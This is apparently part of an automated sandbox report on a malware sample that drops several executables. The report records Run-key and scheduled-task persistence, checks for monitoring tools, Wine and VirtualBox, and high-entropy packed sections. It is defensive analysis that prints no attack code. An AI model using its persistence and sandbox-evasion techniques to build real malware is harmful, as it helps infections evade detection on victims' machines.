                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeUnpacked PE file: 10.2.ae5cfd188c.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeUnpacked PE file: 27.2.37df924488.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeUnpacked PE file: 28.2.9c2827fca4.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;cdtvwakf:EW;qjmihuav:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeUnpacked PE file: 33.2.9c2827fca4.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;cdtvwakf:EW;qjmihuav:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_006742DE
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[1].exe.6.drStatic PE information: real checksum: 0x1de5a6 should be: 0x1de476
                          Source: ae5cfd188c.exe.6.drStatic PE information: real checksum: 0x1de5a6 should be: 0x1de476
                          Source: random[1].exe2.6.drStatic PE information: real checksum: 0x2cb988 should be: 0x2ccccb
                          Source: 37df924488.exe.6.drStatic PE information: real checksum: 0x1bd78b should be: 0x1bf97a
                          Source: file.exeStatic PE information: real checksum: 0x31c073 should be: 0x31a034
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x31c073 should be: 0x31a034
                          Source: random[1].exe0.6.drStatic PE information: real checksum: 0x1bd78b should be: 0x1bf97a
                          Source: 9c2827fca4.exe.6.drStatic PE information: real checksum: 0x2cb988 should be: 0x2ccccb
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: nnwaoodm
                          Source: file.exeStatic PE information: section name: ocwkoyql
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: nnwaoodm
                          Source: skotes.exe.0.drStatic PE information: section name: ocwkoyql
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: xyjapqsh
                          Source: random[1].exe.6.drStatic PE information: section name: fjnsenoe
                          Source: random[1].exe.6.drStatic PE information: section name: .taggant
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name:
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: .idata
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name:
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: xyjapqsh
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: fjnsenoe
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: ipnqzgkg
                          Source: random[1].exe0.6.drStatic PE information: section name: equqovlh
                          Source: random[1].exe0.6.drStatic PE information: section name: .taggant
                          Source: 37df924488.exe.6.drStatic PE information: section name:
                          Source: 37df924488.exe.6.drStatic PE information: section name: .idata
                          Source: 37df924488.exe.6.drStatic PE information: section name:
                          Source: 37df924488.exe.6.drStatic PE information: section name: ipnqzgkg
                          Source: 37df924488.exe.6.drStatic PE information: section name: equqovlh
                          Source: 37df924488.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name: cdtvwakf
                          Source: random[1].exe2.6.drStatic PE information: section name: qjmihuav
                          Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name:
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name: .idata
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name: cdtvwakf
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name: qjmihuav
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FD91C push ecx; ret 0_2_009FD92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F1359 push es; ret 0_2_009F135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00ABD91C push ecx; ret 1_2_00ABD92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00ABD91C push ecx; ret 2_2_00ABD92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ABD91C push ecx; ret 6_2_00ABD92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ADDEDB push ss; iretd 6_2_00ADDEDC
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ABDFC6 push ecx; ret 6_2_00ABDFD9
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00690A76 push ecx; ret 11_2_00690A89
                          Source: file.exeStatic PE information: section name: entropy: 7.067745136702224
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.067745136702224
                          Source: random[1].exe.6.drStatic PE information: section name: entropy: 7.97823310420282
                          Source: random[1].exe.6.drStatic PE information: section name: xyjapqsh entropy: 7.953197683807969
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: entropy: 7.97823310420282
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: xyjapqsh entropy: 7.953197683807969
                          Source: random[1].exe0.6.drStatic PE information: section name: ipnqzgkg entropy: 7.954190185075461
                          Source: 37df924488.exe.6.drStatic PE information: section name: ipnqzgkg entropy: 7.954190185075461
                          Source: random[1].exe2.6.drStatic PE information: section name: entropy: 7.79776762494654
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name: entropy: 7.79776762494654
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0068F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_0068F98E
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00701C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00701C41
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_11-95557
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_6-37332
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9708
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
